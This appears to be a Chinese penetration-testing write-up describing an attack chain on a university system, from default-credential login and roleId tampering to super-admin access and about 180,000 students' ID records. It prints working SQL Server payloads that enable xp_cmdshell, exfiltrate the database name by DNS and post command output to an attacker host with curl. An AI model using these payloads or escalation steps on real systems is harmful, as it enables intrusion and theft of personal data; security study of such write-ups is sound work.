0x01 简介某 211 高校业务系统的一次完整渗透测试。攻击者从系统公开的操作手册文档中获取关键账号规则成功登录普通学生账号随后通过修改角色 ID 实现垂直越权新建管理员账号并进入后台进一步构造数据包提权至超级管理员获取全校近 18 万学生三要素信息。最终在报表 SQL 编辑功能点利用 SQL Server 特性执行 xp_cmdshell成功实现 RCE完成从信息泄露到服务器控制的完整攻击链。本文仅用于技术学习与合规交流严禁非法滥用。因违规使用产生的一切后果由使用者自行承担与作者无关。现在只对常读和星标的才展示大图推送建议大家把渗透安全HackTwo“设为星标”否则可能就看不到了啦参考文章https://www.hacktwohub.com/category/articles https://mp.weixin.qq.com/s/ui5r0PUueHitdpd3Q99e6w末尾可领取挖洞资料/加圈子 #渗透安全HackTwo0x02 正文详情一个非同寻常的信息泄露开局一个登录框右下角有一个点击查看操作手册就很显眼让人很有想点击的欲望。现在了然了账号和密码的默认格式于是便很兴奋地谷歌尝试搜索site:xxx.edu.cn filetype:pdf 学号的相应信息但一无所获。又去看看网站的前端代码测测SQL注入插件找一波接口...同样很正常地没用任何进展。正当感到无计可施想要切换下一个站点之际一不小心又点进了刚才的操作手册.doc文档然后随便地往下翻动除却姓名学号这种每个学校的文件都随处可见的信息敏感信息都打上了不得不说二幺幺高校就是不一样安全意识确实做得很到位。...不对好像掠过去了什么东西利用泄露出来的学生信息成功登录然后就可以愉快地测试了^^初步测试垂直越权返回登录框抓包。经典roleId常用来表示用户权限。也可以翻下前端找一下哪个数字代表哪个权限这里就懒得翻了。一般数字越小权限越大这里直接改成1。提示用户不存在。也就是where roleId1没有查到鉴权做得很棒啊试试改成2呢新增成功新增一个管理员账户回看前端登录的样式知道肯定学生用户和管理员后台登录是分开的那么下一步便是寻找登录接口。看一眼Findsomething插件刚好存在一个/loginadmin的接口。拼接一下url成功得到管理员后台登录入口登录刚刚新建的管理员账号这里能看的东西就挺多了在申请记录里存在大量学生申请的含有敏感信息的文件还能修改申请文件、印章的收费一些踩坑一个普通的账号常见的还有水平越权比如对于这种情况下的学生账号可以请求文件时抓包看看请求的参数是否可控就可以通过修改参数如学号去查看其他人的敏感文件。这是一个请求文件的数据包有一个X-Authorization字段解码可知是JWT验证记录了user信息包括学号等极大概率是控制返回文件的字段userId为学号修改后发包无果。因为又没抓到其它有有效内容的返回包所有的参数只有可能是从前端传出便有些突发奇想尝试一下也许这个fileProperty是这里控制返回文件的参数比如是通过一些加密算法将学号加密成这样的形式只要我能逆向定位到加密JS用其它的学号加密然后发包就能越权看到其它人的文件。于是开始了漫长的JS逆向之路由于网站前端是webpack打包还去学习了一下相应的逆向技术。后面才想起坏了这好像是UUID。。。它是数据库后端生成的而非前端加密学号生成的。。。它之所以不在接口的返回包出现是因为这里的UUID就像表单CSRF-Token一样从一开始登录就自动附着在html元素之中了。越权超级管理员借用管理员权限测试时某些特殊功能还是会弹出一个权限不足的提示比如改变邮箱模块等等。于是猜测到这个站点还应该存在一个超级管理员权限。只是回头看之前添加用户的功能点网站是对添加超级管理员这个功能进行限制了的。但是结合之前测得的这个网站的特性添加一个任意账号抓包看添加用户的数据包修改roleIds参数为1。添加成功切回管理员登录接口登录该账号菜单的功能又多出了很多其中在某个菜单下暴露了该校所有18w学生的sfz号码RCE深入每个功能都测了测也得到了其它的一些敏感数据但是大多却没什么用。难道就止步于此了吗。。都拿到了超管权限信息泄露只是苟且RCE才是梦想。终于在茫茫多的功能中找到了一个很特殊的地方可以编辑SQL语句。且看文件名称与学生用户端前台的文件请求一致那么便很容易猜测前台用户每点击一次文件后端就肯定会执行一下所谓报表SQL菜单SQL的语句并返回结果。如果是这样的话添加些恶意的SQL比如外带数据库名等等可能也会回显到得到的文件里。不多说开始测试。由于这个网站的用户量还挺大为了不影响学校网站的正常运行便拉着一个访问量最小的文件类型进行尝试。这一试花费的时间可就太多了也遇到了挺多问题这个网站的报表SQL、菜单SQL还有前端都有牵连字段甚至语法都不能弄错否则很容易就会出问题执行不了一点。更让测试受阻的是每个用户申请文件如果申请成功(但大多数时候数据库名都不会回显到文件里)网站都会对申请到的文件进行缓存并沿用上一次SQL请求的返回结果意味着我的每一次尝试都可能要换一个新的账户(只能说还好之前获取的账号很多).......终于尝试了无数个payload终于外带了一次数据SELECT xbFROM dbo.cxsyxm aLEFT JOIN z_V_xsjbxxb b ON a.xh b.xhWHERE a.xh 学号 AND a.rn 选中值UNIONSELECT db_name();在测试的过程中也知道了该数据库语法为SQL Server。既然是SQL Server而且是整段语句的完整传入那么我们完全可以用SQL Server的exec xp_cmdshell来命令执行。那么此时便可以新建一个test文件先试试DNSLOG外带数据库名来测试目标服务器是否出网EXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC sp_configure xp_cmdshell, 1;RECONFIGURE;DECLARE dbName NVARCHAR(128);DECLARE cmd NVARCHAR(400);SET dbName DB_NAME();SET cmd ping dbName .ch85c4.dnslog.cn;EXEC xp_cmdshell cmd;登录学生账号请求对应文件此时查看DNSLOG的解析记录成功将数据库名带出那么接下来便是想要执行命令这里便有一个踩坑由于在超管权限下看到的系统管理菜单处是LINUX系统所以便一直进行LINUX的命令执行像是ls之类的命令。后续再测试执行windows命令才成功执行此时才反应过来这套系统是典型的站库分离即WEB服务系统主机和数据库主机是分离开的。那么修改SQL语句为执行dir命令EXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC sp_configure xp_cmdshell, 1;RECONFIGURE;EXEC xp_cmdshell dir 21 | curl -X POST --data - http://ip:port ;成功在VPS上获得命令回显0x03 总结挖本以为只是份平平无奇的操作手册没成想直接给渗透开了挂。顺着文档线索登录学生账号一路越权干到超管顺手抱走全校 18w 学生三要素。最后更是在 SQL 编辑页面一发入魂直接拿下 RCE。一份小文档炸穿整个系统高校安全真是细节藏魔鬼啊。最后愿各位师傅在后续挖洞之路中精准定位漏洞、高效挖掘天天出高危、次次有收获挖洞顺利、不踩坑、多拿奖励共同提升支付业务安全测试能力喜欢这类文章或挖掘SRC技巧文章师傅可以点赞转发支持一下谢谢